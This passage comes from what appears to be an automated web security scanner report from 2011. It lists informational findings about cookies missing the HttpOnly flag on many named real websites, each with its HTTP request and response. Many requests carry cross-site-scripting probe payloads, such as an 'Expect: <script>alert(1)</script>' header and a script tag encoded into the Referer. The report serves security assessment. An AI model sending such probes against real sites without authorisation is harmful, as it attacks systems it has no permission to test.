User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/jpeg
Accept-Ranges: bytes
Last-Modified: Fri, 01 Jun 2007 12:50:50 GMT
ETag: "031367b4ba4c71:7c8"
Content-Length: 1161

......JFIF.....d.d......Ducky.......P.....&Adobe.d...........
...Y...0........................................................

...................... .. . .....................................
...[SNIP]...

7.199. http://www.dmvnow.com/images/wcag1A.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/wcag1A.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/wcag1A.gif HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/gif
Accept-Ranges: bytes
Last-Modified: Tue, 15 May 2007 18:12:38 GMT
ETag: "06fa79e1c97c71:7c8"
Content-Length: 2370

GIF89aX............!!!111999BBBJJJRRRZZZccckkksss{{{.......................................RJJ...................!..1..9..9..B!.R).J!.Z).k1.s9.k1.{9..BcZR..J..BZRJscR...1!...J.....R..J.sRcJ)..cZB!..Z.
...[SNIP]...

7.200. http://www.dmvnow.com/images/webfeed.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dmvnow.com
Path:	/images/webfeed.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/webfeed.png HTTP/1.1
Host: www.dmvnow.com
Proxy-Connection: keep-alive
Referer: http://www.dmvnow.com/favicon.ico88f92%22%3E%3Cscript%3Ealert(%22DORK%22)%3C/script%3E946b1b39319
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerhttp_pool=2541818028.20480.0000

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServerhttp_pool=2541818028.20480.0000; expires=Sat, 02-Apr-2011 18:12:17 GMT; path=/
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: close
Date: Fri, 01 Apr 2011 18:12:17 GMT
Content-Type: image/png
Accept-Ranges: bytes
Last-Modified: Tue, 15 May 2007 18:13:00 GMT
ETag: "05ec4ab1c97c71:7c8"
Content-Length: 3341

.PNG
.
...IHDR..............H-.... pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*! .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...

7.201. http://www.dogtimemedia.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dogtimemedia.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

LB=1963043008.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.dogtimemedia.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Set-Cookie: JSESSIONID=B48571E4AE14D4FF7F1262DE46C00762.web117; Path=/; HttpOnly
X-ServedBy: web117
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://dogtimemedia.com/favicon.ico
Content-Type: text/html
Content-Length: 0
Date: Fri, 01 Apr 2011 15:44:21 GMT
Server: SSWS
Set-Cookie: LB=1963043008.20480.0000; path=/

7.202. http://www.driversed.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.driversed.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerbeta.driversed.com=2885685420.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.driversed.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: BIGipServerbeta.driversed.com=2885685420.20480.0000; path=/
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:23:27 GMT

7.203. http://www.focusonthefamily.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.focusonthefamily.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_www.FocusOnTheFamily.com_sitecore6_80=241701292.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.focusonthefamily.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
ID: pw4
X-Powered-By: ASP.NET; Sitecore CMS
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:07:31 GMT
Set-Cookie: BIGipServerpool_www.FocusOnTheFamily.com_sitecore6_80=241701292.20480.0000; path=/
Sitecore: 6
BIP-Age: not cached
Server-Set-Cache-Control: not set
Max-Age-Custom-Override: 14d
Cache-Control: public, max-age=14d
CDN: No

7.204. http://www.guthy-renker-store.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.guthy-renker-store.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-a0a642f=a0a655d:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.guthy-renker-store.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:22:48 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.2.14
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-a0a642f=a0a655d:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

7.205. http://www.heavygames.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.heavygames.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerheavygames.com=911214858.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.heavygames.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
Date: Fri, 01 Apr 2011 16:04:23 GMT
Set-Cookie: BIGipServerheavygames.com=911214858.20480.0000; path=/

7.206. http://www.jobtarget.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jobtarget.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=XRPNMOS10.50.5.54CKKMY; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.jobtarget.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=XRPNMOS10.50.5.54CKKMY; path=/
Date: Fri, 01 Apr 2011 15:34:19 GMT
Content-Length: 0
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.jobtarget.com/p3p/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND PH"
X-Powered-By: ASP.NET

7.207. http://www.jpcycles.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.jpcycles.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

ARPT=UZOUUKS192.168.223.1CKOIM; path=/
TLTSID=8CB85F91476105580F0F9788F74969B1; Path=/; Domain=.jpcycles.com
TLTUID=8CB85F91476105580F0F9788F74969B1; Path=/; Domain=.jpcycles.comFri, 01-04-2021 16:32:23 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.208. http://www.kraftbrands.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kraftbrands.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerkraftbrands.com=1956537610.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.kraftbrands.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Fri, 01 Apr 2011 17:21:03 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6520
X-Powered-By: ASP.NET
Exires: Thu, 17 Mar 2011 17:21:03 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: BIGipServerkraftbrands.com=1956537610.20480.0000; path=/

404 NOT FOUND

7.209. http://www.lookupanyone.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lookupanyone.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-trans=/II6ovnFtxcRfWefy7qTV8MjXwILdxiMGwg0C7jHaFROL5q+L/nN8LOYhdHx6BIXoH1qM4P5WHax2ao=; expires=Fri, 01-Apr-2011 18:23:11 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lookupanyone.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:53:11 GMT
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerp-trans=/II6ovnFtxcRfWefy7qTV8MjXwILdxiMGwg0C7jHaFROL5q+L/nN8LOYhdHx6BIXoH1qM4P5WHax2ao=; expires=Fri, 01-Apr-2011 18:23:11 GMT; path=/
Vary: Accept-Encoding
Content-Length: 389

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

7.210. http://www.membershiprewards.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.membershiprewards.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerpool_p_www.membershiprewards.com_all=1460316352.0.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.membershiprewards.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:23:03 GMT
Set-Cookie: BIGipServerpool_p_www.membershiprewards.com_all=1460316352.0.0000; path=/

7.211. http://www.mychasecreditcards.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mychasecreditcards.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ARPT=OVMPLYS728AhQu3CKMKU; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mychasecreditcards.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=OVMPLYS728AhQu3CKMKU; path=/
Content-Length: 0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 17:04:00 GMT

7.212. http://www.nielsen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nielsen.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Nielsen.com-cookie=R3937166166; path=/; expires=Fri, 01-Apr-2011 21:22:34 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nielsen.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: Nielsen.com-cookie=R3937166166; path=/; expires=Fri, 01-Apr-2011 21:22:34 GMT
Date: Fri, 01 Apr 2011 15:31:13 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8b
Vary: Accept-Encoding
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

7.213. http://www.nwf.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nwf.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-c0a801c7=c0a8012a:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nwf.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:22:01 GMT
Content-Length: 60
Set-Cookie: Coyote-2-c0a801c7=c0a8012a:0; path=/

The page cannot be displayed because the expectation failed.

7.214. http://www.owners.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.owners.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

X-Mapping-fjhppofk=55E1F410F91EFBE23A0ED8EDED02568C; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.owners.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.5
Content-Type: text/html
Date: Fri, 01 Apr 2011 16:41:04 GMT
Set-Cookie: X-Mapping-fjhppofk=55E1F410F91EFBE23A0ED8EDED02568C; path=/
X-Powered-By: ASP.NET
Content-Length: 60

The page cannot be displayed because the expectation failed.

7.215. http://www.peopletopeople.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.peopletopeople.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerHTTP_P2P.com=3392408074.20480.0000; expires=Fri, 01-Apr-2011 17:44:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.peopletopeople.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 NOT FOUND
Date: Fri, 01 Apr 2011 16:44:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6219
Exires: Thu, 17 Mar 2011 16:44:18 GMT
Cache-Control: private,max-age=0
Content-Length: 13
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: BIGipServerHTTP_P2P.com=3392408074.20480.0000; expires=Fri, 01-Apr-2011 17:44:13 GMT; path=/

404 NOT FOUND

7.216. http://www.personalizationmall.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.personalizationmall.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

pmall99=1124182208.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.personalizationmall.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 60
Date: Fri, 01 Apr 2011 16:32:18 GMT
Connection: close
Set-Cookie: pmall99=1124182208.20480.0000; path=/

The page cannot be displayed because the expectation failed.

7.217. http://www.progressiveagent.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.progressiveagent.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SLAVESS=ID=f7e8816351fc45ce9c0dac6799e1a88e; path=/; domain=.progressiveagent.com; expires=Sun, 31 Dec 2034 00:00:00 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

7.218. http://www.rambler.ru/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rambler.ru
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

lv=1301672829; path=/; expires=Thu, 31-Dec-37 23:55:55 GMT
lvr=1301672829; domain=.rambler.ru; path=/; expires=Thu, 31-Dec-37 23:55:55 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

7.219. http://www.rcuniverse.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rcuniverse.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerrcuniverse_pool=2230063276.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rcuniverse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 15:27:08 GMT
Content-Length: 60
Set-Cookie: BIGipServerrcuniverse_pool=2230063276.20480.0000; path=/

The page cannot be displayed because the expectation failed.

7.220. http://www.richard-group.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.richard-group.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-42e7b5c9=c0a80dc9:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.richard-group.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:20:19 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
Vary: Accept-Encoding
Content-Length: 626
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-42e7b5c9=c0a80dc9:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

7.221. http://www.savingssavy.info/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.savingssavy.info
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

uid=ChViCE2V+TuvpsXnA8zYAg==; expires=Sat, 31-Mar-12 16:11:39 GMT; path=/
uid=Q+TRK02V+TuUYe+GA6WyAg==; expires=Sat, 31-Mar-12 16:11:39 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.savingssavy.info
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Fri, 01 Apr 2011 16:11:39 GMT
Content-Type: image/x-icon
Connection: keep-alive
Content-Length: 0
Last-Modified: Thu, 15 Jul 2010 16:34:51 GMT
Set-Cookie: uid=ChViCE2V+TuvpsXnA8zYAg==; expires=Sat, 31-Mar-12 16:11:39 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Accept-Ranges: bytes
Set-Cookie: uid=Q+TRK02V+TuUYe+GA6WyAg==; expires=Sat, 31-Mar-12 16:11:39 GMT; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"

7.222. http://www.sba.gov/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sba.gov
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServersba.gov=1728186122.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sba.gov
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Fri, 01 Apr 2011 16:36:38 GMT
Content-Length: 0
Set-Cookie: BIGipServersba.gov=1728186122.20480.0000; path=/

7.223. http://www.superherohype.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.superherohype.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PebbleBedCookie=R3654520346; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.superherohype.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: PebbleBedCookie=R3654520346; path=/
Server: Varnish
Retry-After: 120
Content-Type: text/html; charset=utf-8
Content-Length: 521
Date: Fri, 01 Apr 2011 16:31:14 GMT
X-Varnish: 2054550754
Age: 0
Via: 1.1 varnish
Connection: close
X-Cache: MISS from pxy3v.sb.lax1
Expires: Wed, 29 Dec 1976 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<h
...[SNIP]...

7.224. http://www.thebreastcancersite.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thebreastcancersite.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-c0a8286f=a01236f:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thebreastcancersite.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Fri, 01 Apr 2011 16:38:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-c0a8286f=a01236f:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

7.225. http://www.venus.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.venus.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerAB_LionBAlt_Pool=/9YAG3eqnqAfQr70lbK+3V5LBy961j172i9L28GVIJ9z3jfQEX3mMTw6QfDSaFqtpprXEgXlHIiVYQg=; expires=Fri, 15-Apr-2011 16:12:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.venus.com
